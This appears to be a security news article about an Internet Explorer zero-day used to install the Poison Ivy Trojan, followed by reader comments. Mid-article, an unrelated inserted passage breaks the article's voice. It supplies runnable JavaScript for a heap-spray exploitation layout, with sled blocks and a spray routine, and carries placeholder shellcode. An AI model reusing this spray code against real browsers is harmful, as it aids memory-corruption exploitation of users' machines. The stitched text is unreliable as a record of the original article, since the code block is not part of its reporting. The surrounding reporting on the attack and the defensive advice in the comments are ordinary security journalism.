New IE zero day exploit circulating, used to install Poison Ivy


The gang behind the recent Java zero day attacks apparently hasn't packed up for the season.

A researcher examining one of the servers used to launch attacks on vulnerable Java installations says he has found a new zero day exploit for Microsoft's Internet Explorer web browser.

The new and previously unknown (or "zero day") exploit can be used to load malicious software onto machines running fully patched Windows XP SP3 with the latest versions of IE 7 and IE 8 and of Adobe's Flash software, said Eric Romang, who discovered the vulnerability.

Further analysis by the firm AlienVault suggests that the zero day is being used in attacks that install the Poison Ivy Trojan.

In a blog post, Romang, a Luxembourg-based IT security advisor, said he discovered the exploit while analysing a batch of files hosted on one of the servers the Nitro gang used to distribute attacks exploiting the Java vulnerability.

After running one of the sample files on a fully patched Windows XP SP3 system with an up-to-date version of Adobe Flash, Romang was surprised to find that the files loaded malicious software onto the machine.

Further analysis revealed that the .html and Flash files were used to identify suitable targets (Windows XP systems running IE 7 and 8) and to perform a "heap spray", a common technique that fills the browser's memory with attacker-controlled data so that an exploit delivered through an iframe lands reliably; the exploit then triggered the vulnerability and used it to install a malicious program, 111.exe.
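To make the "heap spray" step concrete, here is an added example of the classic JavaScript spray layout that IE exploits of this era used. It is not code from the article, from Romang's analysis or from the Metasploit module; the shellcode is a constructed placeholder of int3 (0xCC) bytes, and the per-string header size and block sizes are assumptions chosen for illustration, not values taken from the real exploit.

```javascript
// Added example: classic JavaScript heap-spray layout (not the article's code).
// Placeholder payload only; sizes and the 0x24-byte string header are assumed.
// Runs under node for inspection; it is a layout illustration, not a working
// spray against a current browser.

// Pack bytes into a JS string, two bytes per UTF-16 code unit, little-endian,
// the same layout legacy exploits produced with unescape("%uXXXX").
function bytesToUnicodeString(bytes) {
  if (bytes.length % 2 !== 0) throw new Error("need an even number of bytes");
  let s = "";
  for (let i = 0; i < bytes.length; i += 2) {
    s += String.fromCharCode(bytes[i] | (bytes[i + 1] << 8));
  }
  return s;
}

// One spray block: a sled of 0x0c0c0c0c followed by the shellcode, sized so
// that, after the engine's per-string header (assumed 0x24 bytes here), the
// block occupies exactly blockBytes. 0x0c0c is both a harmless x86
// instruction ("or al, 0x0c") and, read as an address, a point inside the
// spray, so a corrupted pointer redirected to 0x0c0c0c0c slides down the
// sled into the payload wherever in the block it lands.
function buildSprayBlock(shellcode, blockBytes, headerBytes = 0x24) {
  const unitsPerBlock = Math.floor((blockBytes - headerBytes) / 2); // 16-bit units
  if (unitsPerBlock <= shellcode.length) throw new Error("block too small");
  const sledUnit = bytesToUnicodeString([0x0c, 0x0c]); // one unit = bytes 0c 0c
  const sled = sledUnit.repeat(unitsPerBlock - shellcode.length);
  return sled + shellcode;
}

// Allocate `count` blocks and keep them referenced so the garbage collector
// cannot reclaim them; the exploit then redirects control into the region.
// In the JScript engine of the day each block was a fresh flat copy on the
// heap; modern engines may represent strings differently.
function heapSpray(shellcode, blockBytes, count) {
  const blocks = [];
  for (let i = 0; i < count; i++) {
    blocks.push(buildSprayBlock(shellcode, blockBytes));
  }
  return blocks;
}

// Simulate control arriving at a code-unit offset inside a block: true if
// execution from there sees only sled units until the shellcode begins.
function landsInSled(block, offsetUnits, shellcode) {
  const sledEnd = block.length - shellcode.length;
  if (offsetUnits < 0 || offsetUnits >= sledEnd) return false; // mid-payload
  for (let i = offsetUnits; i < sledEnd; i++) {
    if (block.charCodeAt(i) !== 0x0c0c) return false;
  }
  return block.endsWith(shellcode);
}

// Constructed demo: 16 int3 bytes as payload, 32 blocks of 1 MB each.
const demoShellcode = bytesToUnicodeString(new Array(16).fill(0xcc));
const demoSpray = heapSpray(demoShellcode, 0x100000, 32);
console.log("blocks:", demoSpray.length, "units per block:", demoSpray[0].length);
console.log("landing at offset 12345 reaches payload:",
  landsInSled(demoSpray[0], 12345, demoShellcode));
```

The point of the layout is that the attacker never needs the exact address of the payload: any address that falls inside the sled of any block is good enough, which is why sprays of this kind paired naturally with vulnerabilities that only gave the attacker a loosely controlled pointer.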

That malware has been identified as a new variant of the Poison Ivy Trojan horse program, according to the security firm AlienVault Labs.

Writing about the attack on the AlienVault Labs blog, researcher Jaime Blasco said that evidence collected online suggests the gang behind the Java attacks in August and September may be moving on: domains used in that attack now resolve to new IP addresses and serve up the new and more potent attacks.

Oracle issued an emergency patch for the vulnerability in Java on August 30, though researchers subsequently showed that the patch could be circumvented.

The new IE exploit is being implemented in the Metasploit penetration testing tool, and a module allowing Metasploit users to launch the exploit against IE 7 and IE 8 is expected by Monday, Romang wrote.

(Customers should note that Sophos products protect against the vulnerability by detecting attempts to exploit it as Exp/20124969-A. However, we would still recommend that IE users apply the security patch as soon as it is released by Microsoft.)



17 Responses to New IE zero day exploit circulating, used to install Poison Ivy

  1. Tyw7 · 1111 days ago

    Is Windows 7 or Windows 8 affected?

  2. Sleepy · 1111 days ago

    Has this been assigned a CVE yet?

    • JimboC · 1111 days ago

      Hi Sleepy,

      Since this is a Zero day vulnerability, it has not yet been assigned a CVE.


  3. essjay · 1111 days ago

    Are machines running Sophos being protected from this vulnerability?

    • tim · 1111 days ago

      Would really like to know the answer to this as well!

    • Graham Cluley · 1111 days ago

      Sophos products detect malware we have seen using the exploit as Troj/SWFDL-G, Troj/SWFDL-H and Troj/SWFDL-I.

  4. JimboC · 1111 days ago


    Please follow the recommended advice (see Suggested Actions and Additional Suggested Actions) in the following Microsoft Security Advisory to help protect you from this threat:

    I hope this helps. Thanks.

  5. Tipper · 1111 days ago

    Why don't Sophos post, in the original article, that Sophos products detects this?
    It is much better doing it that way, instead of a comment, way down below the article...
    Just a suggestion. :-)

  6. Nawaqua · 1111 days ago

    Poison Ivy only works on Windows XP and before

    • JimboC · 1110 days ago

      Unfortunately it is not just Poison Ivy being used any more as the malware that gets downloaded once your PC is exploited. Please see the following article from Kaspersky about the new exploits that have been developed and the payload they drop:


  7. John · 1110 days ago

    Sounds like poison ivy was created by MS to get people off of XP


About the author

Paul is a Boston-based reporter and industry analyst with more than a decade of experience covering the IT industry, cyber security and hacking. His work has appeared in The Boston Globe, NPR's Marketplace and Fortune Small Business, as well as industry publications including ZDNet, Computerworld, InfoWorld, eWeek, CIO and CSO. Paul got his 15 minutes as an expert guest on The Oprah Show, but that's a long story.